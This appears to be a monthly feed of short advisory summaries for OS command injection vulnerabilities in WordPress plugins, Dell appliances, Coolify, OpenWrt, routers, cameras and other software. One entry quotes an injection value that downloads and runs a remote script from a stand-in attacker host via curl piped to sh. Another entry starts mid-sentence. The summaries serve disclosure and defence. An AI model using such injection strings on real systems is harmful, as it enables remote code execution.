Command Injection
Monthly
The FileOrganizer WordPress plugin before 1.1.9, Advanced File Manager WordPress plugin before 5.4.12, File Manager Pro WordPress plugin before 2.1.1, File Manager WordPress plugin before 8.0.4 do not properly escape a parameter before passing it to a shell command when processing image operations, allowing authenticated users to perform OS Command Injection. This requires the server to have the ImageMagick convert CLI available without either the PHP imagick or GD extensions.
Authenticated OS command injection in the myVesta hosting control panel lets a low-privileged user inject arbitrary shell commands through the v_ftp_user parameter during FTP-account deletion, escalating to full command execution as the admin user and takeover of the panel. Publicly available exploit code exists (documented by ProjectBlack/PRJBLK) and a vendor fix commit has been published, though no CISA KEV listing or EPSS data is provided. Because a scope change moves the attacker from a low-privilege panel account to admin-level command execution, this is a high-impact privilege-escalation-to-RCE path.
OS command injection in Dell PowerProtect Data Domain across four supported release tracks allows a high-privileged local attacker to execute arbitrary operating system commands. Affected versions span the main release line (7.7.1.0-8.7) as well as LTS2024, LTS2025, and LTS2026 branch releases. No public exploit code or active exploitation has been identified at time of analysis; the local access and high-privilege prerequisites substantially constrain the realistic attack surface despite the full C/I/A impact scores.
Arbitrary OS command execution in Dell PowerProtect Data Domain (versions 7.7.1.0 through 8.7, plus the LTS2026, LTS2025 and LTS2024 branches) lets a high-privileged, remotely-authenticated attacker run operating-system commands on the backup appliance by injecting special characters into an OS command context. The flaw was reported by Dell and is addressed in advisory DSA-2026-278; no public exploit identified at time of analysis and it is not listed in CISA KEV. Because it grants full command execution on a data-protection appliance, successful exploitation can compromise the confidentiality, integrity and availability of backup data.
OS command injection in Dell PowerProtect Data Domain (versions 7.7.1.0 through 8.7, plus the LTS2026, LTS2025, and LTS2024 maintenance branches) lets an authenticated high-privileged remote attacker execute arbitrary operating-system commands on the appliance via improperly neutralized special characters (CWE-78). Because the attacker already holds elevated privileges, the flaw functions as a privilege-boundary and integrity break - turning administrative access into full underlying-OS command execution with high confidentiality, integrity, and availability impact. There is no public exploit identified at time of analysis and the issue is not listed in CISA KEV; it was reported by Dell and fixed in advisory DSA-2026-278.
Authenticated OS command injection in Dell PowerProtect Data Domain (versions 7.7.1.0 through 8.7, plus LTS2026 8.6.1.0-8.6.1.10, LTS2025 8.3.1.0-8.3.1.30, and LTS2024 7.13.1.0-7.13.1.70) lets a high-privileged remote attacker inject arbitrary operating-system commands and execute them on the appliance. Successful exploitation yields full confidentiality, integrity, and availability impact (CVSS 7.2), effectively giving an authenticated administrator command execution on the underlying OS of a backup/data-protection system. There is no public exploit identified at time of analysis, and it is not listed in CISA KEV.
OS command injection in Dell PowerProtect Data Domain enables a high-privileged local attacker to execute arbitrary operating system commands on the backup appliance, achieving full command execution within the Data Domain OS (DDOS). The flaw spans the general release track (7.7.1.0-8.6) and three LTS streams (LTS2024, LTS2025, LTS2026), indicating a shared vulnerable code path across a wide version surface. No public exploit code or CISA KEV listing exists at time of analysis, and the PR:H/AV:L prerequisites meaningfully constrain real-world risk to insider threats or post-compromise scenarios.
OS command injection in Dell PowerProtect Data Domain across four version release trains allows a high-privileged remote attacker to execute arbitrary operating system commands on the appliance. Affected products span mainline versions 7.7.1.0 through 8.7 and three LTS branches, confirmed by Dell Security Advisory DSA-2026-278. No public exploit identified at time of analysis and the CVE is absent from CISA KEV; however, the high integrity and availability impact (I:H/A:H) on a backup appliance makes patching urgent for environments where backup infrastructure is shared or admin credentials are broadly distributed.
Arbitrary command execution in electerm (the open-source cross-platform SSH/SFTP/terminal client) allows a malicious remote server to run OS commands on the connecting user's desktop. The flaw lives in the rmrf(), mv() and cp() helpers in src/app/lib/fs.js, which build shell command strings by interpolating attacker-influenced file paths without escaping shell metacharacters; a hostile SSH/SFTP server that serves files with crafted names can break out of the quoted argument when the victim performs a file operation. Rated CVSS 8.8; no public exploit identified at time of analysis and it is not listed in CISA KEV, so treat this as high-severity but not confirmed exploited.
Command injection leading to arbitrary code execution affects Coder's self-hosted developer workspace platform via the coder/registry `dotfiles` module, which interpolated the user-controlled `dotfiles_uri` into a shell script without validation. Combined with the Create Workspace page's `mode=auto` deep links, an attacker can craft a single URL that silently provisions a workspace with an attacker-supplied `dotfiles_uri` (e.g. `foo$(curl attacker.example/x | sh).com`), turning it into a one-click RCE against any authenticated user who clicks. CVSS is 8.8 (High) with EPSS at 2.28% (81st percentile); there is no public exploit identified and it is not in CISA KEV, though a proof-of-concept URL is documented in the advisory.
Unauthenticated OS command injection in Notifiarr Dockwatch through version 0.6.567 lets remote attackers run arbitrary shell commands on the host and achieve full compromise, since default deployments mount the Docker socket. The root cause is an Execution-After-Redirect flaw (CWE-698) where loader.php redirects unauthenticated users but fails to call exit(), allowing the attacker to seed the required session flag and then reach shell_exec() in ajax/compose.php with attacker-controlled input. The CVSS 4.0 base score is 9.2 (VC/VI/VA all High); there is no public exploit identified at time of analysis and it is not listed in CISA KEV, though a vendor advisory and upstream fix exist.
OS command injection in the mercurial (hg) handler of openSUSE's obs-service-tar_scm source service before 0.12.4 lets an attacker who can supply a _service file inject options and shell metacharacters through the 'revision' field, achieving arbitrary code execution as the source service or as a local user checking out the service. The CVSS 3.1 base score is 10.0 (scope-changed, network vector), reflecting that malicious input is processed by the build service. No public exploit has been identified at time of analysis, though the upstream fix (openSUSE/obs-service-tar_scm PR #552) publicly discloses the vulnerable code path.
Command injection in Ubiquiti UniFi OS (all builds before 5.1.19) lets a low-privileged user on the same network run arbitrary operating-system commands on the underlying host device, giving full control of gateways, recorders, and Cloud Keys. The flaw stems from improper input validation (CWE-20) and carries high confidentiality, integrity, and availability impact (CVSS 8.8). There is no public exploit identified at time of analysis, and CISA's SSVC framework rates exploitation as none, but the technical impact is total and a vendor patch is already available.
Improper access control in Ubiquiti's UniFi Connect Application allows a network-adjacent attacker to bypass authentication and inject arbitrary operating-system commands on the underlying host, yielding full compromise (CVSS 10.0). The flaw chains an access-control weakness (CWE-284) with command injection, so an unauthenticated attacker reachable on the network can execute code with the application's privileges and pivot beyond the app boundary (scope change). No public exploit has been identified at time of analysis, and the issue is not listed in CISA KEV; EPSS data was not provided.
Command injection in Ubiquiti's UniFi Access Application lets a low-privileged attacker with network reach run arbitrary OS commands on the underlying host device, escaping the application into the operating system (CVSS 9.9, scope-changed). Improper input validation (CWE-20) means attacker-supplied data reaches a shell context; there is no public exploit identified at time of analysis, and the flaw is not listed in CISA KEV. Reported through HackerOne and addressed in Ubiquiti Security Advisory Bulletin 066.
Root-level command injection in OpenWrt's luci-app-travelmate/travelmate (confirmed in 2.4.5-r3, sink still present in 2.4.6-1) lets an rpcd/LuCI session holding only the luci-app-travelmate write ACL escalate to arbitrary command execution as root. The LuCI UI limits the auto-login script picker to /etc/travelmate/*.login, but that is a frontend-only check: the root-run backend reads the raw UCI 'script' and 'script_args' values, so an attacker sets script to /bin/sh with controlled arguments to run commands as root when the captive-portal auto-login branch fires. Reported by VulnCheck with no public exploit identified at time of analysis and no CISA KEV listing.
Authenticated OS command injection in the WP Database Backup plugin for WordPress (all versions up to and including 7.11) lets administrator-level users execute arbitrary operating system commands on the underlying server, escalating a WordPress admin foothold into full host RCE. The flaw stems from the wp_db_exclude_table POST parameter being concatenated unescaped into the mysqldump shell command; the injection is stored, so payloads persist in the options table and fire whenever a backup runs. Reported by Wordfence with no public exploit identified at time of analysis and no CISA KEV listing.
Remote OS command injection in Network UPS Tools upsmon (versions 2.8.3-2.8.5) allows a network-positioned attacker - acting as a man-in-the-middle on the plaintext 3493/tcp NUT protocol connection, operating a compromised upsd server, or controlling a rogue UPS device - to execute arbitrary shell commands as the upsmon service account. The vulnerability exists in the NOTIFYCMD alarm handler, where server-supplied ups.alarm text is interpolated directly into a shell command string and executed via system(), enabling injection of shell metacharacters. No public exploit code or active exploitation (CISA KEV) has been identified at time of analysis, though the oss-security disclosure contains sufficient implementation detail to construct a working exploit.
Unauthenticated OS command injection in the Shenzhen Aitemi M300 Wi-Fi Repeater (hardware model MT02) lets network-adjacent attackers run arbitrary shell commands as root through the smacfilter_conf handler in the commuos web backend. Publicly available exploit code exists (published by VulnCheck/IEATASICS), and successful exploitation grants full device takeover; the flaw carries a CVSS 4.0 base score of 9.3 but is reachable only by attackers adjacent to the device's network. No public exploit is listed in CISA KEV, so this is proof-of-concept exposure rather than confirmed active exploitation.
OS command injection in AWS aws-cdk-lib lets an actor who controls a dependency version string in a project's package.json run arbitrary commands on the host executing the CDK toolchain. The flaw lives in the OsCommand helper of the NodejsFunction Docker bundling pipeline, which passes unsanitized version strings into a shell during nodeModules installation. There is no public exploit identified at time of analysis and it is not listed in CISA KEV; AWS has released a fixed version (v2.260.0).
Unauthenticated OS command injection in the Guardian language-system PHP application lets remote attackers run arbitrary operating-system commands by injecting shell metacharacters into the 'id' GET parameter of text_to_subtitles.php, which is concatenated directly into a PHP exec() call. Any internet-reachable instance can be fully compromised without credentials or user interaction, and the CVSS 4.0 base score of 9.3 reflects full confidentiality, integrity, and availability loss. No public exploit identified at time of analysis, though a VulnCheck advisory and a technical gist describe the exact vulnerable code path.
OS command injection in Guardian language-system's transcribe.php lets an unauthenticated remote attacker inject arbitrary shell commands through the 'id' GET parameter, which is concatenated directly into a PHP exec() call. Because no authentication or user interaction is required and the flaw yields full command execution, it maps to a CVSS 4.0 score of 9.3 with high confidentiality, integrity, and availability impact. No public exploit is identified at time of analysis, though a public gist writeup and a VulnCheck advisory document the issue.
OS command injection in Guardian language-system's transcribe_amazon.php allows an unauthenticated remote attacker to run arbitrary operating-system commands on the host. The id GET parameter is concatenated directly into a PHP exec() call that shells out to a transcription job, so appending shell metacharacters (e.g. ; | `) yields command execution with the privileges of the web server. No authentication or user interaction is required (PR:N/UI:N), and a public gist reference exists that may contain proof-of-concept details, though active exploitation is not confirmed in CISA KEV.
OS command injection in Guardian Language System's translate_text.php allows unauthenticated remote attackers to execute arbitrary operating-system commands by injecting shell metacharacters into the 'id' GET parameter, which is concatenated directly into a PHP exec() call. Because no authentication is required and the CVSS 4.0 vector is AV:N/AC:L/PR:N/UI:N, exploitation is trivial and yields full command execution in the web server's context. There is no public exploit identified at time of analysis, though a VulnCheck advisory and a public gist document the flaw.
Unauthenticated OS command injection in Guardian language-system's speech_text.php allows remote attackers to execute arbitrary shell commands by injecting metacharacters into the id GET parameter, which is passed unsanitized into a PHP exec() call. No authentication is required (CVSS 4.0 base 9.3), giving full read/write/availability impact on the host. A referenced GitHub gist and a VulnCheck advisory document the flaw, indicating publicly available exploit details, though it is not listed in CISA KEV.
OS command injection in the Guardian language-system's speechmac.php enables unauthenticated remote attackers to run arbitrary operating-system commands by injecting shell metacharacters into the 'id' GET parameter, which is concatenated directly into a PHP exec() call. No credentials or user interaction are required, so any network-reachable instance can be fully compromised. This is a CWE-78 flaw carrying a CVSS 4.0 base score of 9.3; no public exploit identified at time of analysis, though a referenced gist may contain proof-of-concept material.
OS command injection in the Guardian language-system lets unauthenticated remote attackers run arbitrary shell commands by injecting metacharacters into the 'id' GET parameter, which speechmac_text.php concatenates directly into a PHP exec() call. The CVSS 4.0 base score is 9.3 (critical) with full compromise of confidentiality, integrity, and availability, and no authentication or user interaction is needed. No public exploit identified at time of analysis, though a referenced gist and the VulnCheck advisory may contain technical exploitation detail.
OS command injection in Guardian language-system allows an unauthenticated remote attacker to execute arbitrary shell commands by injecting metacharacters into the 'id' GET parameter of complex_start.php, which is passed unsanitized into a PHP exec() call. No authentication or user interaction is required, and the CVSS 4.0 score of 9.3 (Critical) reflects full compromise of confidentiality, integrity, and availability. A public gist demonstrating the flaw means publicly available exploit code exists, though it is not listed in CISA KEV.
OS command injection in the Guardian language-system lets an unauthenticated remote attacker run arbitrary shell commands by injecting metacharacters into the 'id' GET parameter, which speech.php passes unsanitized into a PHP exec() call. Rated CVSS 4.0 9.3 (Critical) with a fully remote, no-privilege, no-interaction vector, this is a direct pre-auth RCE. No CISA KEV listing or EPSS score is present in the provided data, and no confirmed public exploit is identified, though a referenced GitHub gist and a VulnCheck advisory document the flaw.
OS command injection in the Guardian language-system lets an unauthenticated remote attacker execute arbitrary operating-system commands on the hosting server. The flaw arises because text.php passes the user-controlled 'id' GET parameter straight into a PHP exec() call without sanitization, allowing shell metacharacters to break out of the intended command. The CVSS 4.0 base score is 9.3 (network vector, no privileges, no user interaction); no public exploit is identified at time of analysis, though a referenced gist and a VulnCheck advisory document the issue.
OS command injection in Guardian language-system lets unauthenticated remote attackers run arbitrary shell commands by injecting metacharacters into the 'id' GET parameter of translate.php, which is concatenated directly into a PHP exec() call. Publicly available exploit code exists (published as a gist via VulnCheck), and the CVSS 4.0 base score of 9.3 reflects full compromise of confidentiality, integrity, and availability with no authentication or user interaction. There is no public exploit identified as actively exploited in CISA KEV, so the current risk is driven by ease of exploitation and public PoC rather than confirmed in-the-wild abuse.
Remote code execution in Guardian language-system allows unauthenticated attackers to run arbitrary OS commands by injecting shell metacharacters into the 'id' GET parameter of subtitles.php, which is concatenated directly into a PHP exec() call invoking jobs/subtitle_rendering.php. The CVSS 4.0 base score of 9.3 reflects network-reachable, no-privilege, no-interaction exploitation, and publicly available exploit code exists (published via VulnCheck), though there is no public exploit identified as being actively used in the wild at time of analysis.
Default-credential authentication bypass in JAIOTlink C492A-W6 Wi-Fi IP cameras (firmware 4.8.30.57701411) lets attackers log in to the anyka_ipc HTTP service on port 80 using the built-in admin username with an empty password, granting full access to snapshots, live video, network configuration, and factory-level API endpoints. Because the same interface exposes a SetMAC command-injection surface, this trivial access can be pivoted toward device-level code execution. Publicly available exploit code exists (published by VulnCheck), though this CVE is not listed in CISA KEV and no active exploitation is confirmed.
Authenticated remote code execution in JAIOTlink C492A-W6 Wi-Fi IP cameras (firmware 4.8.30.57701411) lets a logged-in attacker run arbitrary OS commands via the HTTP PUT NetSDK/Factory SetMAC endpoint. The Wireless parameter is only partially validated by sscanf(), so a value shaped as a valid MAC prefix followed by a semicolon and shell payload survives validation and is passed unsanitized into an echo command run through system(). Publicly available exploit code exists (VulnCheck), and CVSS 4.0 rates it 8.7 (High); no public exploit identified in CISA KEV, so this is not confirmed actively exploited.
Authenticated OS command injection in Seiko Solutions SkyBridge MB-A100 and MB-A110 industrial LTE gateways allows an attacker who is already logged in with administrative privileges to execute arbitrary operating-system commands on the device. The CVSS 4.0 base score is 8.6 (High), reflecting full confidentiality, integrity, and availability impact once admin access is obtained, though the PR:H requirement confines exposure to authenticated administrators. There is no public exploit identified at time of analysis and the flaw is not listed in CISA KEV.
Unauthenticated OS command injection in Tenda AC18 v15.03.05.05 exposes the device to full remote compromise via a crafted HTTP request to the /goform/fast_setting_internet_set endpoint. The vulnerability is a second-order (stored) injection through the mac parameter - malicious payloads are written into device configuration and executed when triggered. No public exploit identified at time of analysis, though SSVC confirms a proof-of-concept exists and the attack is automatable, making mass exploitation technically feasible against internet-exposed devices.
Unauthenticated remote command injection in StoneFly Storage Concentrator (SC) and its virtual appliance variant (SCVM) lets remote attackers run arbitrary OS commands as root by sending a crafted HTTP request to the debug.pl script, which processes attacker input without sanitization. Rated CVSS 4.0 10.0 and reported through CISA ICS-CERT (advisory ICSA-26-181-06); no public exploit identified at time of analysis. This is a complete-compromise primitive requiring no credentials or user interaction.
Unauthenticated remote code execution in StoneFly Storage Concentrator (SC) and its virtual appliance variant (SCVM) lets attackers run arbitrary commands as root by sending a crafted packet to the ms_service.pl listener on TCP port 9000. The flaw was reported through CISA ICS-CERT (advisory ICSA-26-181-06) and carries the maximum CVSS 4.0 base score of 10.0; no public exploit has been identified at time of analysis, but the combination of network reachability, zero authentication, and root-level impact makes this a top-priority issue for any exposed device.
Arbitrary code execution in Grav CMS before 2.0.0-beta.2 stems from three distinct flaw classes: PHP object injection via unsafe unserialize() of attacker-controllable data in the Scheduler JobQueue, FileCache adapter, and Session components, an OS command injection in the plugin/theme InstallCommand git clone routine, and a Twig sandbox blocklist bypass enabling server-side template injection. An attacker who can influence the serialized input can chain available gadgets to run arbitrary PHP, while the command-injection path is reachable by authenticated administrators through plugin/theme installation. No public exploit identified at time of analysis; the issues were privately reported by VulnCheck and are fixed in 2.0.0-beta.2.
Authenticated command injection in Coolify's CA Certificate management feature (all versions prior to 4.0.0-beta.464) lets any logged-in user inject arbitrary OS commands that execute as the configured SSH user on a managed server. Because Coolify requires that SSH user to be root or a docker-group member, successful exploitation yields full compromise of the managed host and every Docker container it runs. There is no public exploit identified at time of analysis and the issue is not listed in CISA KEV, but the low attack complexity and minimal privilege requirement make it a high-priority patch for any multi-user Coolify instance.
{$command}'` invocation without sanitizing single quotes, and the user-controlled `docker_compose_custom_build_command` and `docker_compose_custom_start_command` fields are interpolated directly into that shell string. No public exploit has been identified at time of analysis, but the CVSS scope-change flag (S:C) confirms the critical container-to-host escape dimension, and the injection technique is well-understood - making the practical impact substantially higher than the reported 6.6 base score implies.
Arbitrary OS command execution in RPG Maker MV and MZ (Gotcha Gotcha Games) is triggered when a victim loads a maliciously crafted save-file, allowing an attacker to run commands with the privileges of the game process. The flaw is a classic OS command injection (CWE-78) reported through JPCERT/JVN; no public exploit has been identified at time of analysis and it is not in CISA KEV. Because exploitation is local and requires the user to load attacker-supplied data, impact hinges on social-engineering victims into opening untrusted saves.
Privileged OS command injection in the AVTECH Security Corporation DGM3103SCT surveillance device lets an authenticated user of the web management console inject operating-system commands that run with root privilege (CWE-78). Disclosed via JPCERT/CC coordination (JVN28979424), it carries CVSS 4.0 base 8.6 with no public exploit identified at time of analysis. Because the CVSS vector requires high privileges (PR:H), exploitation presumes a logged-in administrative web user, but successful abuse yields full root-level device takeover.
Authenticated OS command injection in Coolify before 4.0.0-beta.471 lets any user holding destination management permissions execute arbitrary commands as root on managed servers. The 'network' parameter in the Destination Network Management feature is passed unsanitized into shell commands, yielding full root-level remote code execution on the host. No public exploit identified at time of analysis; the issue is fixed in 4.0.0-beta.471.
Authenticated remote code execution in Coolify (self-hosted PaaS) before 4.0.0-beta.470 lets a low-privileged authenticated user run arbitrary commands on the deployment host. The flaw is an OS command injection in the Nixpacks build pack: the user-supplied install_command build parameter is concatenated unsanitized into a shell command executed during the build phase, allowing escape from the build context to host-level command execution. There is no public exploit identified at time of analysis, and it is not listed in CISA KEV, but the path to abuse is straightforward for any user who can configure a deployment.
Root command injection in OpenWrt's LuCI web interface (luci-proto-openvpn through 0.11.1) lets an authenticated user with OpenVPN protocol configuration access run arbitrary commands as root. The flaw lives in the generateKey ubus method, where the cl_meta parameter is passed unescaped into a popen() shell call. No public exploit has been identified at time of analysis, but a vendor advisory (GHSA-pm9w-522m-8rrh) and fix commit exist, and the CVSS 4.0 score of 8.7 reflects full confidentiality, integrity, and availability impact on the affected device.
Authenticated root command injection in the OpenWrt LuCI community Tailscale app (luci-app-tailscale-community) lets a logged-in web UI user run arbitrary OS commands as root through the tailscale.do_login RPC method. Because the user-supplied loginserver and loginserver_authkey values are placed inside a double-quoted shell string, $() and backtick substitutions are evaluated by the outer shell, turning configuration input into command execution. Reported by VulnCheck with a published GHSA advisory; no public exploit identified at time of analysis and the issue is not in CISA KEV.
OS command injection in the Edimax EW-7478APC wireless access point firmware 1.04 allows a network-reachable authenticated attacker to execute arbitrary OS commands on the device by manipulating the `rootAPmac` parameter in POST requests to `/goform/formStaDrvSetup`. A public proof-of-concept exploit is available, indexed by VulDB and documented externally, and the vendor did not respond to responsible disclosure - making a vendor-released patch unlikely in the near term. The provided CVSS 4.0 score of 2.1 appears to significantly understate actual impact, as OS command injection on embedded Linux network devices typically yields full device compromise rather than the 'Low' impact across all three dimensions assigned in the vector.
OS command injection in the Edimax EW-7478APC wireless access point (firmware 1.04) allows remote attackers with low-privilege credentials to execute arbitrary operating system commands by manipulating the rootAPmac parameter in a POST request to /goform/formiNICbasic. A public proof-of-concept exploit is available, materially lowering the barrier to exploitation. The vendor did not respond to coordinated disclosure, leaving no official patch path for affected devices.
OS command injection in Edimax EW-7478APC 1.04 allows a remote low-privileged attacker to execute arbitrary operating system commands by manipulating the submit-url parameter in POST requests to the /goform/formAccept endpoint. The vendor was notified prior to public disclosure but did not respond, leaving the vulnerability unpatched. A public proof-of-concept exploit has been disclosed, and the CVSS 4.0 impact metrics (VC:L/VI:L/VA:L) appear to significantly understate the realistic impact of OS command injection on an embedded network device, which typically yields full system control.
OS command injection in the D-Link DCS-935L Wi-Fi network camera (firmware 1.10.01) lets a remote attacker inject arbitrary operating-system commands through the UID POST parameter handled by the sub_400E40 function in setconf.cgi. The CVSS 4.0 vector requires low privileges (PR:L), so an attacker needs some level of authenticated/session access, after which they gain full confidentiality, integrity, and availability impact on the device. Publicly available exploit code exists (disclosed via VulDB), though there is no public exploit identified as actively exploited in the wild.
Command injection in Wavlink WL-NU516U1-A router firmware (M16U1_V240425) allows authenticated remote attackers to execute arbitrary OS commands by submitting crafted POST parameters to the wireless CGI configuration handler. The affected function sub_401D68 within /cgi-bin/wireless.cgi fails to sanitize the SSID2G2, SSID5G2, AuthMethod2, and WPAPSK12 parameters before passing them to OS-level commands. A public proof-of-concept exploit is confirmed available on GitHub; this CVE is not currently listed in CISA's KEV catalog, but the vendor has already released a patched firmware.
Command injection in ANTLR4's Go code generation target (GoTarget.java) allows a local low-privilege attacker to execute arbitrary OS commands via unsanitized input passed to the gofmt invocation, affecting all versions up to 4.13.2. This vulnerability is scoped entirely to local environments such as developer workstations or CI/CD pipelines running ANTLR4 Go target code generation. A publicly available proof-of-concept exploit exists per the GitHub disclosure, but this is not confirmed as actively exploited (not in CISA KEV), and the CVSS 4.0 base score of 1.9 reflects its genuinely constrained real-world impact.
Authenticated command injection in H.View HV-500S6 IP cameras allows a logged-in user to inject unsanitized XML field values into the device's certificate generation interface, which are passed into a backend certificate-creation shell command and executed with elevated privileges. Because exploitation requires valid credentials (CVSS 4.0 PR:H) but is reachable over the network with low complexity, an attacker who obtains any account on the device can run arbitrary OS commands and take full control of the camera. No public exploit has been identified at time of analysis and the CVE is not listed in CISA KEV.
Unauthenticated remote code execution affects Kestra OSS (the open-source event-driven orchestration platform) prior to versions 1.0.45 and 1.3.21, where a flawed authentication whitelist lets attackers reach protected API endpoints without credentials. The AuthenticationFilter exempts the public config endpoint using a suffix match (request.getPath().endsWith("/configs")) instead of an exact path match, so any API path ending in 'configs' bypasses Basic Auth, allowing an attacker to create and run arbitrary workflows. Because the default-enabled script-execution plugins (shell, Python) run inside the worker container as root, this escalates directly to unauthenticated RCE. Carries a maximal CVSS of 10.0; there is no public exploit identified at time of analysis.
Local code execution in Notepad++ before 8.9.6.1 occurs because the <GUIConfig name="commandLineInterpreter"> value in config.xml is loaded into _nppGUI._commandLineInterpreter with no validation, whitelist, or signature check, then passed directly to ShellExecute when a user invokes File → Open Containing Folder → cmd. An attacker who can plant or modify config.xml runs an arbitrary executable in the victim's session the next time they use this menu action. Publicly available exploit code exists (Exploit-DB 52606), but there is no public exploit identified as actively exploited; the issue is not in CISA KEV.
Local OS command injection in Notepad++ before 8.9.6.1 lets an attacker who can write to a user's shortcuts.xml inject an arbitrary executable path into a <Command> entry under <UserDefinedCommands>, which feedUserCmds() loads into UserCommand._cmd with no validation and later passes straight to ShellExecute when the victim clicks the corresponding Run-menu item. Because the malicious entry renders as an ordinary Run-menu item, it doubles as a stealthy persistence mechanism that executes attacker-chosen binaries in the victim's user context. There is no public exploit identified at time of analysis and the flaw is not listed in CISA KEV, but the fix is confirmed in release 8.9.6.1.
Remote code execution in the Cudy LT300 3.0 4G LTE router (firmware before 2.5.12) lets authenticated users run arbitrary OS commands by embedding shell metacharacters in the cbid.system.ntp.current POST parameter of the system time (NTP) configuration page. Because the CVSS 4.0 vector specifies PR:L, an attacker needs valid (low-privileged) web credentials but no user interaction, and successful injection yields full host compromise (VC/VI/VA all High). No public exploit identified at time of analysis; the flaw was reported by VulnCheck and a vendor patch is available.
Cross-origin information disclosure in the Nx monorepo graph server (versions 17.0.4 through 22.7.1) exposes the full project dependency graph and workspace metadata to any website a developer visits while `nx graph` is running locally. The server unconditionally broadcasts `Access-Control-Allow-Origin: *`, bypassing the browser Same-Origin Policy and allowing attacker-controlled JavaScript to silently read internal project structure. In rare cases, the `/help` endpoint - which executes a workspace-configured target command - creates a path to arbitrary command injection on the developer's machine. No public exploit or CISA KEV listing identified at time of analysis.
Container-to-host command execution in Dokku's cron plugin (versions prior to 0.38.7) lets an actor who can control an application's app.json schedule break out of the Docker container and run arbitrary commands on the host as the privileged Dokku user. Because the cron command was interpolated into a shell-evaluated line, special characters such as ';' or '>' were interpreted on the host rather than confined to the container, yielding a scope-changing escape (CVSS 9.9). No public exploit has been identified at time of analysis, but the root cause and fix are fully documented in the vendor advisory and patch.
OS command injection in Dokku (the Docker-powered self-hosted PaaS) prior to version 0.38.2 allows an authenticated user with git push access to execute arbitrary shell commands as the privileged dokku user. The flaw stems from a permissive app-name validation regex that accepts shell metacharacters, which are then interpolated unquoted into a generated bash pre-receive hook; a semicolon in the app name terminates the intended command and runs attacker-supplied commands on git push. There is no public exploit identified at time of analysis, but the fix is confirmed in 0.38.2 and the underlying mechanics are fully documented in the GitHub advisory and PR #8590.
OS command injection in Dell Container Storage Modules (CSM) version 2.16.0 - spanning the csi-powerstore, csi-unity, csi-powerflex, and csi-powermax CSI drivers - lets a remote, high-privileged attacker inject and execute arbitrary operating-system commands (CWE-78). Successful exploitation yields full confidentiality, integrity, and availability impact with a scope change, meaning command execution can reach beyond the vulnerable component into the surrounding host or cluster. There is no public exploit identified at time of analysis and it is not listed in CISA KEV; the CVSS 3.1 base score is 8.0 (High).
Remote code execution in Flowise (versions 2.2.7-patch.1 through pre-3.0.6) lets attackers run arbitrary OS commands by abusing the Custom MCP feature, which is intended to spawn local MCP servers via tools like npx. Because the default installation runs with no authentication (unless FLOWISE_USERNAME/FLOWISE_PASSWORD are set) and lacks role-based access control, an attacker can POST a crafted JSON payload bearing the 'x-request-from: internal' header to /api/v1/node-load-method/customMCP and fully compromise the host container. Publicly available exploit code exists in the GHSA advisory, including a reverse-shell payload via nc.
Pre-authentication remote code execution in File Browser before 2.63.6 lets unauthenticated attackers run arbitrary OS commands when the optional Hook Authentication feature is enabled. Because login credentials are interpolated into an external shell command via os.Expand without sanitization, shell metacharacters placed in the username or password field at the login screen execute on the server before authentication occurs. No public exploit identified at time of analysis, but the GitHub Security Advisory (GHSA-m93h-4hw7-5qcm) confirms the flaw and CVSS 4.0 rates it 9.3 (Critical).
Arbitrary command execution in pnpm before 10.34.2 and 11.5.3 allows a malicious repository to run attacker-chosen native binaries as the developer or CI user during a routine install. The flaw stems from pnpm processing configDependencies in pnpm-workspace.yaml before command dispatch: a repo could declare pacquet/@pnpm/pacquet as a config dependency, causing pnpm to resolve a platform-specific @pacquet/<platform>-<arch>/pacquet binary from node_modules/.pnpm-config and spawn it. Publicly available exploit code exists, though EPSS is low (0.12%, 2nd percentile) and it is not in CISA KEV.
Arbitrary command execution in Vim's bundled zip plugin (autoload/zip.vim) affects builds from 9.1.1784 up to the 9.2.0678 fix on systems where the plugin falls back to PowerShell for archive operations. When browsing, reading, extracting, updating or deleting zip entries, the plugin quotes archive entry names for the shell but not for PowerShell, so a crafted entry name escapes the string context and runs attacker-supplied commands with the privileges of the user who merely opened or viewed the archive. There is no public exploit identified at time of analysis and the issue is not listed in CISA KEV; risk is bounded to Windows/PowerShell-fallback deployments and requires user interaction.
Authenticated command injection in Schneider Electric PowerLogic P7 power metering devices allows a privileged user to execute arbitrary OS commands with elevated privileges over a network-exposed service, fully compromising device integrity, confidentiality, and availability. The flaw (CWE-78) stems from improper neutralization of special elements passed to an underlying OS command. No public exploit identified at time of analysis, and the device is not listed in CISA KEV; EPSS data was not provided.
OS command injection in Dell Display and Peripheral Manager (DDPM) for macOS, all versions prior to 2.3, allows a low-privileged local user to inject and execute arbitrary operating-system commands through improperly neutralized special elements (CWE-78). Because the affected component is a privileged peripheral-management utility, successful injection can yield command execution with full impact to confidentiality, integrity, and availability. There is no public exploit identified at time of analysis and the issue is not listed in CISA KEV, so risk is currently theoretical but high-impact for systems with this Dell utility installed.
OS command injection in Rapid7's InsightConnect Tcpdump Plugin (versions before 2.0.0) on Linux lets an authenticated attacker run arbitrary operating-system commands by injecting shell metacharacters into the 'options' or 'filter' parameters, which are unsafely concatenated into a tcpdump shell invocation. An attacker holding low-privileged access to a SOAR workflow that uses this plugin can fully compromise the orchestrator host (high confidentiality, integrity, and availability impact). There is no public exploit identified at time of analysis and the issue is not on the CISA KEV list; EPSS is modest at 0.73%.
OS command injection in Rapid7's InsightConnect Traceroute Plugin (Linux, versions below 1.0.3) lets attackers inject arbitrary shell commands through the traceroute action's host, port, max_ttl, count, or time_out parameters, which are concatenated into a shell command without sufficient validation. Successful exploitation grants full command execution in the plugin container with the same impact on confidentiality, integrity, and availability. This was reported by the vendor (Rapid7) with a fix in 1.0.3; there is no public exploit identified at time of analysis, and EPSS sits at a modest 0.55% (42nd percentile).
Remote OS command injection in Rapid7's InsightConnect AWK Plugin (versions below 1.2.2 on Linux) lets attackers run arbitrary operating-system commands through the process_string action's text or expression parameters, which are unsafely concatenated into a shell command. The CVSS 9.8 rating reflects full confidentiality, integrity, and availability loss with no privileges or user interaction required by the vector. There is no public exploit identified at time of analysis, EPSS is low (0.55%), and CISA SSVC marks exploitation as none, so risk today is potential rather than observed.
OS command injection in Rapid7's InsightConnect Finger Plugin (versions prior to 1.0.3) on Linux lets an authenticated attacker run arbitrary operating-system commands by injecting shell metacharacters into the user or host parameters, which are passed unsanitized into a constructed shell command (CWE-78). Because the plugin executes within the InsightConnect SOAR orchestrator, successful exploitation yields full read/write and availability impact on the host running the plugin. No public exploit is identified at time of analysis, and EPSS estimates only a 0.73% 30-day exploitation probability.
